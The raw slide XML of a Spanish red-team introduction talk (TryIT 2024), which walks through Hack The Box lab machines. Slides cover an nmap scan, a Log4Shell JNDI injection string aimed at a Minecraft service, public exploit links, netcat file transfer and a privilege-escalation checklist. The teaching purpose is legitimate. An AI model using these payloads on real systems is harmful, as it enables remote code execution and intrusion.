Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.jpg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/" TargetMode="External"/><Relationship Id="rId30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pp.hackthebox.com/machines/587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34275AA-0024-4D19-8333-CF381627B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6079" y="4438564"/>
            <a:ext cx="8926584" cy="1707312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="14400" rIns="0" bIns="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="13970"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Introducción</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>práctica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> al Red Team</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Verdana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B2840574-DCD0-0C10-8762-F8596CFB8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36" y="3387220"/>
            <a:ext cx="3810000" cy="3810000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F347BFD3-6715-F986-2299-FC73C233FE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6347536" y="6336945"/>
            <a:ext cx="8926584" cy="506983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="14400" rIns="0" bIns="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="14400" algn="ctr">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:defRPr sz="5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/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0" err="1"/>
              <a:t>TryIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0"/>
              <a:t> 2024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" kern="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336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FEC74FD-653C-6CEC-1E5B-E1DF4319B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¿Qué tenemos delante?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6EF29F-CA18-9CF8-501F-64F3E9EF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" y="4572000"/>
            <a:ext cx="15001875" cy="3238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8D05A77-7EC5-9C41-9171-AFBFB2D599BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="2073601"/>
            <a:ext cx="124079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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0" err="1"/>
              <a:t>oN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t> nmap.txt –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0" err="1"/>
              <a:t>sCV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t> 10.10.11.249</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>: sin hacer ping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>oN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>: guardar en archivo “nmap.txt” en formato texto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>sCV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>: -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> + -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> scripts + servicios en los puertos)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110395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FEC74FD-653C-6CEC-1E5B-E1DF4319B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No me va la web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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916047-0259-E6C9-52EA-E0A916C1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25" y="1936614"/>
            <a:ext cx="14167738" cy="61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FEC74FD-653C-6CEC-1E5B-E1DF4319B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Mapeamos DNS local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526D0BB-6C6F-277B-0C05-16815DC0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00" y="2090142"/>
            <a:ext cx="12074200" cy="33835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DDD64B4-49AF-1541-009D-0DF1765F30D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189162" y="6375400"/>
            <a:ext cx="8999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Añadimos una entrada al archivo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>/hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1544691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DCBEE-AC4F-CCBC-F516-D88DE25E8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E7EFF2C-7082-0655-FD74-9011CF4A8E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¿Qué tenemos delante?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99855B-45E8-C8D9-CB1E-93290253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1825497"/>
            <a:ext cx="11389488" cy="65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1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A2563-40B5-C3E6-729E-5BD4A394D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577D9E8-FFBE-6CA3-8D20-49E6E5D81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Minecraft, ¿jugamos?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1DAAFD-D3AD-F88D-F707-CB841111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13" y="1822400"/>
            <a:ext cx="15357973" cy="2838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4A8BDF-5C2B-84B2-23F2-F8B36780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4845994"/>
            <a:ext cx="8750300" cy="404619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CC85295-3641-00DB-34E8-C70F13C0E3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10591800" y="6412131"/>
            <a:ext cx="4483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4"/>
              </a:rPr>
              <a:t>https://github.com/o7-Fire/Log4Shell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dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/kozmer/log4j-shell-poc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928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79606-8705-9874-9046-9CF37A5C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986D4CE-C29A-5BE0-EEA9-952EB078A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1399535"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Script que veo, script que ejecuto, ¿no?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455C0B-289F-1D30-5C0A-FAB4A4CE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2520950"/>
            <a:ext cx="13877925" cy="17907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71C3FB-283D-A1E3-55E1-A5CEAAC3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4502797"/>
            <a:ext cx="11801475" cy="10096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ED03751-FFF6-4DFC-AB8F-B0D53A23E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5842001"/>
            <a:ext cx="11801475" cy="25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1746-EF87-7E31-56A1-174EAFF7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0BBA081-1A8C-21A3-BE9C-54810E828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Vale, ya lo tengo, ¿y ahora?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C0B588-6F3A-A753-3CE9-0BB6A1A7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1923403"/>
            <a:ext cx="8248650" cy="40290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1D90CF8-425F-F2E6-11F9-1DD26428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9" y="6238575"/>
            <a:ext cx="13130991" cy="10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4656-15A6-F8D2-FD8F-DF5183BDA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4A24CD6-1A67-3C39-5502-ED4987EF4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Minecraft.exe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found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DDE6554-CFF3-AF28-DF93-CB513D6AEEC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378200" y="8029066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https://github.com/MCCTeam/Minecraft-Console-Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/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AD368F-483D-E307-B5C5-43AEE1D98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2" t="21952" r="17399"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384300" y="1808123"/>
            <a:ext cx="6883400" cy="5805684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B5E2B47-9413-3F62-D497-CA3C0413FC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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9150349" y="2138776"/>
            <a:ext cx="6496051" cy="547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5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8EA34-446C-E3A6-CB02-24950DDC9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7EE84BA-162D-D7AE-C37D-E86614F62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${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>://localhost:1389/a}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B5A612-C558-8DD6-3535-6369FACD1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2" y="1981200"/>
            <a:ext cx="15230475" cy="457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7F6AA0C-E25B-08CD-56CA-BBE3738391A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512762" y="7289800"/>
            <a:ext cx="8999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Pero … no pasa nada …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>¿Has leído lo que estás ejecutando?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418367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26B1-3233-5474-DED7-4D9D2142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028E685-B992-2291-F4D4-B5703E47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Antes de correr … ¡leer!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0188D5-0AC4-B70A-29D7-4AE12624D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76"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="563563" y="2768200"/>
            <a:ext cx="4732337" cy="43449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8360C1-A08C-38F7-7D8E-6B0B8CA9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58" y="2286790"/>
            <a:ext cx="9540292" cy="53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Hombre con barba y bigote&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B4E1DF-C249-D701-D9C0-41AD01881E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793" y="2152542"/>
            <a:ext cx="2328207" cy="2328207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FF73001-DE85-FBB0-AAC5-BE30A5DC53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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>whoami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D1F596-1834-6BBC-3E00-2B2C802E62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500" y="2152542"/>
            <a:ext cx="4617303" cy="2377674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>Víctor Nieves Sánchez</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Antiguo alumno de Ing. Informática de la UPM, actual hacker y jugador de WoW.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EF22545-59EF-5B8A-0101-84B0E467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49" y="1114952"/>
            <a:ext cx="7568252" cy="5725912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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ADF80D35-C639-E018-7935-FF4E0F006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3737822"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="211793" y="4246356"/>
          <a:ext cx="8031455" cy="2922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Imagen 19" descr="Código QR&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD01EF1-74A4-2712-B4A3-46BA635BB0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1" t="42166" r="22706" b="11569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13111564" y="3714093"/>
            <a:ext cx="2917734" cy="268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1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59D49-808A-45BD-E28A-EA44485F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E474CDC-1437-5290-FECC-116E8BB87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Ahora sí, ¡Log4shell!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E78282-B0D8-6BAB-A521-1D062392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052454"/>
            <a:ext cx="12128500" cy="61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810BD-1AF8-1F67-FD07-6ED31DC0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827D71F-15DD-7EAD-78E0-A21DEFEFC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¿Y ahora, qué?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4D270B-B0F0-2C1A-DFDB-6C1DE4D7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7" y="1789112"/>
            <a:ext cx="5317055" cy="37480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B82DBF-20D1-936B-0414-4151482D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83" y="4211637"/>
            <a:ext cx="9111030" cy="39481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0FFB3D8-2D98-7531-6BF4-8BF3199502C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6622683" y="1789112"/>
            <a:ext cx="8033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 Permisos de usuario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>winPeas</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- Archivos en la raíz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- Contraseñas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>hardcodeadas</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- Servicios ejecutados por otros usuarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- Configuración de red (¿podemos pivotar a otros hosts?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> versión de Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351674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1CD8-963E-0E87-0BB9-584E4127A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E3FCEF0-A459-EA76-C559-2F2FB2BF7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A la Kali a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>decompilar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E28B7F-1C6D-0817-C4AC-6C4D399B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1733550"/>
            <a:ext cx="9163050" cy="2381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A8FD00-FB0B-D711-40E7-E1935DE21937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8213732"/>
            <a:ext cx="813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https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/int0x33/nc.exe/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/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2B76EB1-F684-5280-761F-5A610BB26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4307031"/>
            <a:ext cx="13233400" cy="28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1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0AED-1903-68CC-C367-3FF2D68A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166404-B4B8-406E-75F3-3BDEE5B8F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A la Kali a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>decompilar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434CD09-17DA-DEE3-398E-02C5FF02CE53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8213732"/>
            <a:ext cx="813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https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/int0x33/nc.exe/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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5E2828-1651-0A55-A276-11190C8DA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839418"/>
            <a:ext cx="13474700" cy="29105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227CDA-02EE-9B97-AA11-0504DDDB7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952064"/>
            <a:ext cx="13700662" cy="27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8CE6-3622-9828-5972-656FED75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F506BF0-93C0-119A-D17C-330B7C4B2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A la Kali a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>decompilar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E35A12-B764-1E7F-FD9B-CC9E2D993117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="8340732"/>
            <a:ext cx="813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http://java-decompiler.github.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es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382E65-2C05-2201-5CF9-8A2392C4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5" y="1730375"/>
            <a:ext cx="133064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69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C66CE-CEB9-D50D-9B7F-0E7DF49A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4AEE0E-F064-57A8-25A6-28B4AF553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es-ES" dirty="0"/>
              <a:t>Escalando privilegios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0828CFA-C982-50C8-9745-E1A6C9C7915A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215900" y="8469461"/>
            <a:ext cx="599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https://stackoverflow.com/a/34307483</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/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DEBAF0-CDCD-3E9B-05C0-227E0C0B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9" y="1788962"/>
            <a:ext cx="11620500" cy="1962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5E4C76F-D3F5-396B-B8E8-C376D1315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337" y="3845453"/>
            <a:ext cx="8493126" cy="45296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1046FF-53CB-F3E3-0923-DAAE10C23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812" y="3902768"/>
            <a:ext cx="62007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5ABB2EE-7A52-79DA-E3B7-B311A6D69F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s-ES" sz="2400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4F550E7F-B103-C6EC-924E-227AD58EC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7200" y="6305275"/>
            <a:ext cx="7315200" cy="3657600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://app.hackthebox.com/machines/577</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t> 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1603E01-0915-8E39-7591-A5A824D3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274" y="3029804"/>
            <a:ext cx="7272475" cy="33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62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9281-73DB-1506-758C-95762DC8A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1D0E50-C797-51B5-3FA7-D69DF68BF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Escaneando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C6225A-7D44-126A-8635-FF37F893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1793378"/>
            <a:ext cx="9772650" cy="3657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78BB18-5D56-B3F1-01C4-6BFB8C0CF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9" y="6050459"/>
            <a:ext cx="96964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0E132-F5BC-A9CA-5FE4-DE5769AC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FB58921-9220-C557-4F39-42E8588E3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/>
              <a:t>¿Algo en la web principal?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1B9CEF-2B16-0D0D-1D96-569257E2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2" y="1174575"/>
            <a:ext cx="8458635" cy="44261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AD7161-134F-19DD-3323-8D2F27B11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2" y="5763171"/>
            <a:ext cx="10693618" cy="29722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34955D-7FB9-F62E-FC9D-1ED115A33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420" y="2470149"/>
            <a:ext cx="7320433" cy="260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2A3A-AD4E-4D30-47EE-4890925F9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356D400-154D-2968-EC73-D14DB7422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/>
              <a:t>¿No será un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>vhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>?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7375FE8-1CA2-052D-EFE0-DAEDD4E0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5" y="5010432"/>
            <a:ext cx="8689339" cy="345635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A0F0182-FB17-F85E-8404-102941AFC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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9041266" y="1601562"/>
            <a:ext cx="7023099" cy="629705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85CC6C8-8B63-1F07-ACD3-30B503505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939"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="191635" y="1115646"/>
            <a:ext cx="8648698" cy="34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B638B90-E3A6-E068-20D7-9DBD48B22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B9BC03F-0793-FA44-888E-B48542137F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err="1"/>
              <a:t>Cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Teams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8D95599-1655-58E5-54FD-3830F0528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¿Qué equipos hay en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>ciberseguirdad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>?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7F19B20-04D2-99CC-3BC2-F98B1CFFF412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s-ES" dirty="0"/>
              <a:t>04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2D46129F-A78A-BF3B-5B34-C23B18574520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E16581F1-F10B-E379-619D-41893C69236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s-ES" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> vs Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Team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D33A7E7-5CF3-C54D-868A-53FC9A8CDEC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s-ES" dirty="0"/>
              <a:t>¿Qué diferencia un Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> o una auditoría de seguridad?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E51BA214-E8D2-5613-710A-CA62D777B4FB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s-ES" dirty="0"/>
              <a:t>05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78B3788F-466B-3230-6206-56C4B966700A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188F8069-E3A8-C518-122B-47E0EC03633B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s-ES" dirty="0"/>
              <a:t>Fases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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F757578F-D3CF-C877-DBF6-190FA432D625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1841500" y="5312869"/>
            <a:ext cx="4866564" cy="571488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Pasos que se deben dar para realizar un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de éxito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41A2A9B-E852-6681-3CB8-09D36C9A0C8B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s-ES" dirty="0"/>
              <a:t>06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75A2B442-D331-703F-B816-AE10E4B9FF28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4DB01ACD-3747-F84D-B33A-75D80F5A49BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="98"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>¿Cómo empezar en el Hacking?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553DB128-12D8-4E64-E23B-79D21A40239F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>
          <a:xfrm>
            <a:off x="1841500" y="6589681"/>
            <a:ext cx="4866564" cy="571488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Contenido gratuito para empezar nuestro camino como hackers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12693BFD-29C2-D76D-8930-26C610C073CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="100"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>07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FD01BD79-7DE2-112B-C39F-CE42B43F9E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="101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1AA6A698-8711-FD82-E1F5-2B3CF8DEE5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="102"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
